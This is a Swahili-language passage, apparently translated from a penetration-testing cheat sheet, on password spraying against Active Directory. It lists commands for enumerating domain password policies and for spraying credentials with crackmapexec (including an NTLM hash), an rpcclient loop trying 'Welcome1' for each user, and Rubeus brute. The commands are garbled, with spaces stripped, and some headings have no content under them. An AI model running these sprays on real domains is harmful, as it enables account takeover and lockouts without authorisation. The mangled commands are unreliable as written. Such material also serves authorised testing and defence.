Baada ya kupata majina ya mtumiaji halali kadhaa unaweza kujaribu nywila za kawaida zaidi (zingatia sera ya nywila ya mazingira) kwa kila mmoja wa watumiaji uliowagundua.
Kwa chaguo-msingiurefu wa nywila ni 7.
Tambua kwamba unaweza kufunga akaunti kadhaa ikiwa unajaribu nywila zisizo sahihi (kwa chaguo-msingi zaidi ya 10).
Pata sera ya nywila
Ikiwa una siri za mtumiaji au shell kama mtumiaji wa kikoa unaweza pata sera ya nywila na:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Kutumia crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Kwa moduli ya scanner/smb/smb_login ya Metasploit:
Kutumia rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Kwa Invoke-DomainPasswordSpray (Inaweza kuzalisha watumiaji kutoka kwa kikoa kwa chaguo-msingi na itapata sera ya nenosiri kutoka kwa kikoa na kikomo cha majaribio kulingana nayo):